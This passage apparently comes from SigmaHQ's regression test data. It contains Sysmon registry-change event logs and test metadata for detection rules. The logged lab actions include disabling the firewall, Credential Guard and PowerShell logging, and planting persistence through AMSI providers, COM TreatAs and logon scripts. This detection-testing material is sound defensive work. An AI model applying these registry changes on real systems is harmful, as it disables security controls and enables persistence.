"#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:10:21.071", "ProcessGuid": "5AA13A44-640D-68FE-3756-000000004002", "ProcessId": 992, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber", "Details": "DWORD (0x00001189)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/info.yml ================================================ id: 88bf1ccf-789d-4864-9eaf-547990ffe90a description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 509e84b9-a71a-40e0-834f-05470369bd1e title: Default RDP Port Changed to Non Standard Port regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/509e84b9-a71a-40e0-834f-05470369bd1e.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:12:38.481829Z" } }, "EventRecordID": 28344631, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, 
"ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:12:38.476", "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", "ProcessId": 7460, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\https", "Details": "DWORD (0x00000002)", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:12:38.491176Z" } }, "EventRecordID": 28344632, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:12:38.476", "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", "ProcessId": 7460, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\http", "Details": "DWORD (0x00000002)", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { 
"Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:12:38.500426Z" } }, "EventRecordID": 28344633, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:12:38.492", "ProcessGuid": "5AA13A44-6494-68FE-6A56-000000004002", "ProcessId": 7460, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\bad-subdomain\\*", "Details": "DWORD (0x00000002)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/info.yml ================================================ id: a118df85-dbf8-48d6-a3a6-f6ddebf975b6 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 45e112d0-7759-4c2a-aa36-9f8fb79d3393 title: IE Change Domain Zone regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/45e112d0-7759-4c2a-aa36-9f8fb79d3393.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.json ================================================ { "Event": { "#attributes": { "xmlns": 
"http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-12-26T06:45:50.191274Z" } }, "EventRecordID": 23575, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3484, "ThreadID": 3424 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "swachchhanda", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-12-26 06:45:50.187", "ProcessGuid": "0197231E-2F1D-694E-F304-000000000A00", "ProcessId": 12232, "Image": "C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetObject": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\\EnableVirtualizationBasedSecurity", "Details": "DWORD (0x00000000)", "User": "swachchhanda\\xodih" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/info.yml ================================================ id: 7d8d93c3-25b2-4225-9f91-66997f5b446f description: N/A date: 2025-12-26 author: Swachchhanda Shrawan Poudel (Nextron Systems) rule_metadata: - id: 73921b9c-cafd-4446-b0c6-fdb0ace42bc0 title: Windows Credential Guard Disabled - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_credential_guard_disabled/73921b9c-cafd-4446-b0c6-fdb0ace42bc0.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.json 
================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:22:33.661127Z" } }, "EventRecordID": 28528165, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:22:33.654", "ProcessGuid": "5AA13A44-66E9-68FE-AC56-000000004002", "ProcessId": 7108, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\\Enabled", "Details": "DWORD (0x00000000)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/info.yml ================================================ id: b60c9c4c-27e7-4870-af1d-f35582a44c07 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a title: Windows Hypervisor Enforced Code Integrity Disabled regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled/8b7273a4-ba5d-4d8a-b04f-11f2900d043a.evtx ================================================ FILE: 
regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:29:32.286061Z" } }, "EventRecordID": 28656599, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:29:32.271", "ProcessGuid": "5AA13A44-688C-68FE-D556-000000004002", "ProcessId": 2712, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareServer", "Details": "DWORD (0x00000000)", "User": "ATTACKRANGE\\Administrator" } } } { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:29:32.296086Z" } }, "EventRecordID": 28656618, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": 
"SetValue", "UtcTime": "2025-10-26 18:29:32.287", "ProcessGuid": "5AA13A44-688C-68FE-D656-000000004002", "ProcessId": 368, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters\\AutoShareWks", "Details": "DWORD (0x00000000)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/info.yml ================================================ id: c99b67cd-0a57-4023-9f88-35806d622b48 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e title: Disable Administrative Share Creation at Startup regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_disable_administrative_share/c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:36:31.269411Z" } }, "EventRecordID": 28785637, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", 
"UtcTime": "2025-10-26 18:36:31.258", "ProcessGuid": "5AA13A44-6A2F-68FE-0857-000000004002", "ProcessId": 9720, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\\EnableFirewall", "Details": "DWORD (0x00000000)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/info.yml ================================================ id: aa89a142-e72f-4b37-acd2-274ed81a1477 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 974515da-6cc5-4c95-ae65-f97f9150ec7f title: Disable Microsoft Defender Firewall via Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_disable_defender_firewall/974515da-6cc5-4c95-ae65-f97f9150ec7f.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T18:42:48.447971Z" } }, "EventRecordID": 28901143, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": 
"-", "EventType": "SetValue", "UtcTime": "2025-10-26 18:42:48.434", "ProcessGuid": "5AA13A44-6BA8-68FE-2F57-000000004002", "ProcessId": 7476, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience", "Details": "DWORD (0x00000000)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/info.yml ================================================ id: b5d83cd8-e1e5-459e-9f06-7c1e41a9bfeb description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 title: Disable Windows Security Center Notifications regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications/3ae1a046-f7db-439d-b7ce-b8b366b81fa6.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T23:49:35.941239Z" } }, "EventRecordID": 16380977, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } 
}, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-25 23:49:35.941", "ProcessGuid": "5AA13A44-620F-68FD-9A3E-000000004002", "ProcessId": 9952, "Image": "C:\\Windows\\system32\\regsvr32.exe", "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{00000000-DEAD-DEAD-DEAD-B2B2E0859059}\\(Default)", "Details": "FakeAmsi", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml ================================================ id: 825fc38f-ff54-4338-8016-6f3477c7aa8f description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 title: Potential Persistence Via New AMSI Providers - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T23:53:11.117530Z" } }, "EventRecordID": 16447792, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } 
}, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-25 23:53:11.114", "ProcessGuid": "5AA13A44-62E7-68FD-C13E-000000004002", "ProcessId": 8536, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\\(Default)", "Details": "{00000001-0000-0000-0000-0000FEEDACDC}", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml ================================================ id: 482ef6c8-3c2a-4b7b-a82e-b09f27576b96 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 9b0f8a61-91b2-464f-aceb-0527e0a45020 title: Potential COM Object Hijacking Via TreatAs Subkey - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T23:56:33.715505Z" } }, "EventRecordID": 16510574, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": 
"ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-25 23:56:33.705", "ProcessGuid": "5AA13A44-63B1-68FD-D93E-000000004002", "ProcessId": 9452, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\UserInitMprLogonScript", "Details": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\art.bat", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml ================================================ id: 84c6a082-3aa5-4387-b113-60415aeb9458 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 9ace0707-b560-49b8-b6ca-5148b42f39fb title: Potential Persistence Via Logon Scripts - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-31T05:57:54.388692Z" } }, "EventRecordID": 657715, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3080, "ThreadID": 4948 } 
}, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "srv-01.midgardnet.tech", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-31 05:57:54.387", "ProcessGuid": "14207D89-4FE2-6904-D207-000000004002", "ProcessId": 5612, "Image": "C:\\Windows\\system32\\reg.exe", "TargetObject": "HKU\\S-1-5-21-1938467512-983293709-721003795-1103\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging", "Details": "DWORD (0x00000000)", "User": "MIDGARDNET\\SwachchhandaP" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml ================================================ id: a6c567e7-d5d4-494b-9a66-71fa87c44f8e description: N/A date: 2025-10-31 author: SigmaHQ Team rule_metadata: - id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 title: PowerShell Logging Disabled Via Registry Key Tampering regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T23:59:35.308812Z" } }, "EventRecordID": 16567695, "Correlation": null, 
"Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-25 23:59:35.300", "ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002", "ProcessId": 7500, "Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", "Details": "DWORD (0x00000001)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml ================================================ id: 070ba0e3-b1e5-4fa9-9935-ca8a8c233b3d description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 title: PUA - Sysinternal Tool Execution - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": "0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-26T00:00:51.970813Z" } 
}, "EventRecordID": 16592206, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-26 00:00:51.957", "ProcessGuid": "5AA13A44-64B2-68FD-FB3E-000000004002", "ProcessId": 4776, "Image": "C:\\Users\\Administrator\\Downloads\\FakeSysinternals.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", "Details": "DWORD (0x00000001)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml ================================================ id: a977324d-5006-46e6-bb1c-9d8b13344f00 description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: f50f3c09-557d-492d-81db-9064a8d4e211 title: Suspicious Execution Of Renamed Sysinternals Tools - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json ================================================ { "Event": { "#attributes": { "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" }, "System": { "Provider": { "#attributes": { "Name": "Microsoft-Windows-Sysmon", "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" } }, "EventID": 13, "Version": 2, "Level": 4, "Task": 13, "Opcode": 0, "Keywords": 
"0x8000000000000000", "TimeCreated": { "#attributes": { "SystemTime": "2025-10-25T23:59:35.308812Z" } }, "EventRecordID": 16567695, "Correlation": null, "Execution": { "#attributes": { "ProcessID": 3308, "ThreadID": 4008 } }, "Channel": "Microsoft-Windows-Sysmon/Operational", "Computer": "ar-win-dc.attackrange.local", "Security": { "#attributes": { "UserID": "S-1-5-18" } } }, "EventData": { "RuleName": "-", "EventType": "SetValue", "UtcTime": "2025-10-25 23:59:35.300", "ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002", "ProcessId": 7500, "Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe", "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", "Details": "DWORD (0x00000001)", "User": "ATTACKRANGE\\Administrator" } } } ================================================ FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml ================================================ id: 55e4036d-e026-4110-bf9a-a1037f28edbb description: N/A date: 2025-10-24 author: SigmaHQ Team rule_metadata: - id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d title: PUA - Sysinternals Tools Execution - Registry regression_tests_info: - name: Positive Detection Test type: evtx provider: Microsoft-Windows-Sysmon match_count: 1 path: 